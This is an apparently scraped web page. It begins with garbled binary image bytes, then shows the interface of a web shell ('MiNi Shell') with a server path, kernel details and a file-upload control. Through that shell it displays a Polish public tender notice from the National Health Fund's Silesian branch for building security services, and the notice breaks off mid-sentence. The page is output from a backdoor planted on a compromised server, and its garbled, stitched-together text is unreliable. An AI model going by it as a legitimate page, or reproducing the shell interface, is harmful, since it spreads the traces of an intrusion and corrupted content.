JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250606/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250606/0026535201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usługi ochrony obiektów Śląskiego Oddziału Wojewódzkiego <br/>Narodowego Funduszu Zdrowia </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">NARODOWY FUNDUSZ ZDROWIA Śląski Oddział Wojewódzki</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 015817985</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kossutha 13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-844</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@nfz-katowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.nfz-katowice.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - Narodowy Fundusz Zdrowia</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Jednostka ubezpieczenia zdrowotnego </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usługi ochrony obiektów Śląskiego Oddziału Wojewódzkiego <br/>Narodowego Funduszu Zdrowia </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-cc124566-31e7-4f31-8ac0-c45fcc0508f5</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00265352</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00649881/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.7 Usługa ochrony obiektów Śląskiego OW NFZ /12 miesięcy/</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://nfz-katowice.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami w szczególności składanie oświadczeń, wniosków, zawiadomień (w tym przekazywanie dokumentów składanych na żądanie Zamawiającego) oraz przekazywanie informacji z zastrzeżeniem wyjątków wskazanych w SWZ odbywa się elektronicznie za pośrednictwem Platformy Zakupowej, w zakładce „Korespondencja”.<br/>Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy Zakupowej, Wykonawca winien skontaktować się z dostawcą rozwiązania teleinformatycznego Platforma Zakupowa pod numer tel. +48 22 576 22 23 (infolinia dostępna w dni robocze, w godzinach 9.00-17.00) e-mail: oneplace@marketplanet.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymaganie techniczne i organizacyjne dot. korespondencji elektronicznej zostały opisane w Rozdziale VI SWZ.<br/>Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (tj. Dz.U. z 2020 r. poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy (tj. Dz.U. z 2020 r. poz. 2415 ze zm.).<br/>Zamawiający wskazuje instrukcję korzystania z Platformy Zakupowej w niniejszym postępowaniu w zakładce „Baza wiedzy”.<br/>Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego, tj. bezpłatnie rejestrując się lub logując, w przypadku posiadania konta na Platformie Zakupowej, akceptuje warunki korzystania z Platformy Zakupowej, określone w Regulaminie zamieszczonym na stronie internetowej https://oneplace.marketplanet.pl/regulamin oraz uznaje go za wiążący.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Tak. Kwestie dotyczące klauzuli RODO reguluje SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">13/us/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest świadczenie usługi ochrony obiektów Śląskiego Oddziału Wojewódzkiego Narodowego Funduszu Zdrowia, w tym zabezpieczenia technicznego polegającego na eksploatacji, serwisowaniu, przeglądach, w tym konserwacji i naprawach w miejscach zainstalowania elektronicznych urządzeń i systemów alarmowych (systemów telewizji przemysłowej – CCTV, systemów sygnalizacji włamania i napadu - SSWiN i kontroli dostępu – KD) sygnalizujących zagrożenie chronionych osób i mienia, zwanych dalej także „systemami”, zgodnie z zasadami i warunkami określonymi w SWZ. <br/><br/>Realizacja zamówienia winna przebiegać na warunkach określonych w projektowanych postanowieniach umowy oraz zgodnie z wymogami formularza opis przedmiotu zamówienia, stanowiących załączniki do niniejszej SWZ. Projektowane postanowienia umowy przewidują i określają warunki ewentualnej zmiany treści umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79700000-1 - Usługi detektywistyczne i ochroniarskie</p> <p class="mb-0">79715000-9 - Usługi patrolowe</p> <p class="mb-0">79711000-1 - Usługi nadzoru przy użyciu alarmu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-07-13 do 2026-07-13</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu:<br/>1. Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej - Wykonawca winien wykazać posiadanie uprawnień do prowadzenia działalności gospodarczej polegającej na świadczeniu usług ochrony osób i mienia. <br/>W celu wykazania spełnienia warunku udziału w postępowaniu dotyczącego uprawnienia do prowadzenia działalności gospodarczej, Wykonawca składa oświadczenie o spełnianiu ww. warunku (patrz Rozdział XV ust. 1 SWZ), a na wezwanie Zamawiającego dokument, o którym mowa w Rozdziale XV ust. 2 lit.a SWZ.<br/>Zgodnie z art. 15 ust.1 ustawy z dnia 22.08.1997 r. o ochronie osób i mienia (tj. Dz.U. z 2025 r. poz. 532), podjęcie działalności gospodarczej w zakresie usług ochrony osób i mienia wymaga uzyskania koncesji, określającej zakres i formy prowadzenia tych usług.<br/>Zgodnie z art. 15 ust. 2 ww. ustawy koncesji nie wymaga działalność gospodarcza w zakresie, o którym mowa w art. 3 pkt 2, jeżeli nie dotyczy obszarów, obiektów i urządzeń określonych w art. 5 ust. 5.<br/>W związku z faktem, iż obiekty w lokalizacji przy ul. Kossutha 13 w Katowicach należą do obiektów określonych w art.5 ust.5 ww. ustawy (obiekty, w tym obiekty budowlane, urządzenia, instalacje, usługi ujęte w jednolitym wykazie obiektów, instalacji, urządzeń i usług wchodzących w skład infrastruktury krytycznej), świadczenie usług ochrony i mienia w zakresie zabezpieczenia technicznego w tej lokalizacji wymaga również posiadania przez Wykonawcę koncesji w zakresie zabezpieczenia technicznego. <br/>2. Sytuacja finansowa lub ekonomiczna<br/>Określenie warunków:<br/>a)	Sytuacja finansowa - Wykonawca winien wykazać posiadanie środków finansowych w wysokości co najmniej 200 000,00 złotych lub zdolności kredytowej na poziomie nie mniejszym niż 200 000,00 złotych, w okresie nie wcześniejszym niż 1 miesiąc do upływu terminu składania ofert. <br/>W celu wykazania spełnienia warunku udziału w postępowaniu dotyczącego sytuacji finansowej, Wykonawca składa oświadczenie o spełnianiu ww. warunku (patrz Rozdział XV ust. 1 SWZ), a na wezwanie Zamawiającego dokument, o którym mowa w Rozdziale XV ust. 2 lit. b SWZ.<br/>b)	Sytuacja ekonomiczna - Wykonawca winien wykazać, iż jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej <br/>z przedmiotem zamówienia (ochrona osób i mienia) na sumę gwarancyjną nie niższą niż 1 000 000,00 złotych.<br/>W celu wykazania spełnienia warunku udziału w postępowaniu dotyczącego sytuacji ekonomicznej, Wykonawca składa oświadczenie o spełnianiu ww. warunku (patrz Rozdział XV ust. 1 SWZ), a na wezwanie Zamawiającego dokument, o którym mowa XV ust. 2 lit. c SWZ.<br/>3. Zdolność techniczna lub zawodowa<br/>Określenie warunków:<br/>a)	Zdolność techniczna - Wykonawca winien wykazać, że dysponuje co najmniej 1 samochodem dla potrzeb udziału grupy interwencyjnej w każdej lokalizacji objętej ochroną, czyli w sumie Wykonawca winien dysponować co najmniej czterema (4) samochodami dostępnymi Wykonawcy w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami.<br/>W celu wykazania spełnienia warunku udziału w postępowaniu dotyczącego zdolności technicznej, Wykonawca składa oświadczenie o spełnianiu ww. warunku (patrz Rozdział XV ust. 1 SWZ), a na wezwanie Zamawiającego dokument, o którym mowa w Rozdziale XV ust. 2 lit. d SWZ.<br/>b)	Zdolność zawodowa – Wykonawca winien spełnić warunek dotyczący zdolności zawodowej (doświadczenia) polegający na należytym wykonaniu, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywaniu, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przynajmniej trzech (3) usług ochrony osób i mienia o wartości nie mniejszej niż 500 000,00 zł brutto każda, polegających na sprawowaniu bezpośredniej ochrony fizycznej stałej, w tym co najmniej 1 usługa winna dotyczyć ochrony budynku biurowego.<br/>Pod pojęciem wykonana usługa należy rozumieć zamówienie polegające na sprawowaniu bezpośredniej ochrony fizycznej stałej o wartości nie mniejszej niż 500 000,00 (pięćset tysięcy) złotych brutto, zrealizowane (wykonane), tj. zakończone przez Wykonawcę.<br/>Pod pojęciem wykonywana usługa należy rozumieć zamówienie polegające <br/>na sprawowaniu bezpośredniej ochrony fizycznej stałej, którego pewna część <br/>o wartości nie mniejszej niż 500 000,00 (pięćset tysięcy) złotych brutto, została już zrealizowana (wykonana) przez Wykonawcę. <br/>Pod pojęciem budynek biurowy należy rozumieć budynek wykorzystywany jako miejsce pracy dla działalności biura, sekretariatu lub innych o charakterze administracyjnym, np.: budynki banków, urzędów pocztowych, urzędów miejskich, gminnych, ministerstw, itp. lokali administracyjnych; budynki centrów konferencyjnych i kongresów, sądów i parlamentów (definicja budynku biurowego wg rozporządzenia Rady Ministrów z dnia <br/>30 grudnia 1999 r. w sprawie Polskiej Klasyfikacji Obiektów Budowlanych (PKOB), Dz.U z 1999 r. Nr 112 poz. 1316 ze zm.).<br/>W celu wykazania spełnienia warunku udziału w postępowaniu dotyczącego zdolności zawodowej (posiadania wymaganego doświadczenia), a opisanego powyżej, Wykonawca składa oświadczenie o spełnianiu ww. warunku (patrz Rozdział XV ust. 1 SWZ), a na wezwanie Zamawiającego dokumenty, o których mowa w Rozdziale XV ust. 2 pkt lit. e i lit. f SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Na wezwanie Zamawiającego Wykonawca, którego oferta została najwyżej oceniona w terminie, nie krótszym niż 5 dni, od dnia wezwania, złoży następujące podmiotowe środki dowodowe aktualne na dzień złożenia:<br/>a)	koncesja na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia – por. Rozdział XIV ust. 1 pkt 2 SWZ;<br/>b)	informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert – por. Rozdział XIV ust. 1 pkt 3 lit. a SWZ;<br/>c)	dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż określona w SWZ – por. Rozdział XIV ust. 1 pkt 3 lit.b SWZ;<br/>d)	formularz wykaz samochodów dostępnych Wykonawcy w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami – por. Rozdział XIV ust. 1 pkt 4 lit.a SWZ;<br/>e)	formularz wykaz usług - wykonanych a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich trzech (3) lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem,<br/>f)	dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa powyżej, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonywane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn z nie zależnych od niego, nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy. W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych, referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione <br/>w okresie ostatnich 3 miesięcy.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Na podstawie art. 97 ust. 1 ustawy Pzp Zamawiający żąda od Wykonawcy wniesienia wadium. Wadium ustala się w wysokości: 30 000,00 złotych (słownie: trzydzieści tysięcy złotych 00/100).<br/>2.	Wykonawca może wnieść wadium w jednej lub kilku następujących formach:<br/>1)	pieniądzu, <br/>2)	gwarancjach bankowych,<br/>3)	gwarancjach ubezpieczeniowych,<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 09.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>3.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy wskazany poniżej:<br/>BGK o/Katowice Nr 97 1130 1091 0003 9003 7420 0002.<br/>Na potrzeby przelewów międzynarodowych podaje się: SWIFT, tj.: „GOSKPLPW” oraz adres banku: Bank Gospodarstwa Krajowego Oddział w Katowicach, ul. Podchorążych 1, 40-043 Katowice.<br/>4.	W przypadku wnoszenia wadium w formie innej niż pieniądz, dokument – gwarancja, poręczenie – musi być przekazany Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. Jako beneficjenta gwarancji wadialnej dla niniejszego postępowania należy wskazać Zamawiającego. W przypadku wniesienia wadium w formie poręczeń lub gwarancji, koniecznym jest, aby gwarancja lub poręczenie obejmowały odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę, określone w art. 98 ust. 6 ustawy Pzp. Treść takiego dokumentu nie może warunkować wypłacenia kwoty wadium Zamawiającemu od badania zasadności żądania wypłaty przez wystawcę dokumentu. Dokument w swej treści winien uwzględniać postanowienia art. 98 ust. 6 ustawy Pzp. Dokument swoją ważnością musi obejmować okres odpowiadający terminowi związania ofertą (o którym mowa w SWZ). Bieg tego terminu rozpoczyna się wraz z upływem terminu składania ofert (art. 307 ust. 1 ustawy Pzp). Pierwszym dniem związania ofertą będzie zatem dzień, w którym upływa termin składania ofert. Wadium winno mieć charakter bezwarunkowy i nieodwołalny.<br/>5.	Wykonawca wnosi wadium przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 (art. 97 ust. 5 ustawy Pzp ).<br/>6.	W przypadku wnoszenia wadium w formie innej niż pieniężna, wadium (gwarancje, poręczenia - oryginał stosownego dokumentu wadialnego) należy wnieść przed upływem terminu składania ofert w postaci elektronicznej, opatrzonej kwalifikowanym podpisem elektronicznym osoby uprawnionej do jego wystawienia w imieniu Gwaranta albo Poręczyciela. Wadium powinno być oznaczone w następujący sposób: wadium dotyczące postępowania nr 13/us/2025 Świadczenie usługi ochrony obiektów Śląskiego Oddziału Wojewódzkiego Narodowego Funduszu Zdrowia. <br/>7.	Zamawiający zobowiązany jest odrzucić ofertę, jeżeli Wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymał wadium nieprzerwalnie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium w przypadku, o którym mowa <br/>w art. 98 ust. 2 pkt 3 ustawy Pzp (art. 226 ust. 1 pkt 14 ustawy Pzp).<br/>8.	Zasady zwrotu wadium wykonawcy oraz utraty wadium przez wykonawcę wraz z odsetkami na rzecz Zamawiającego reguluje art. 98 ustawy Pzp <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Zgodnie z art. 58 ust. 2 ustawy Pzp Wykonawcy tacy winni ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą załączyć do oferty pełnomocnictwo. Dokument pełnomocnictwa winien odpowiadać zasadom określonym w Rozdziale IX ust. 3 SWZ dla pełnomocnictw.<br/>2. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, wymagane oświadczenia i dokumenty określa SWZ.<br/>3. W przypadku wspólnego 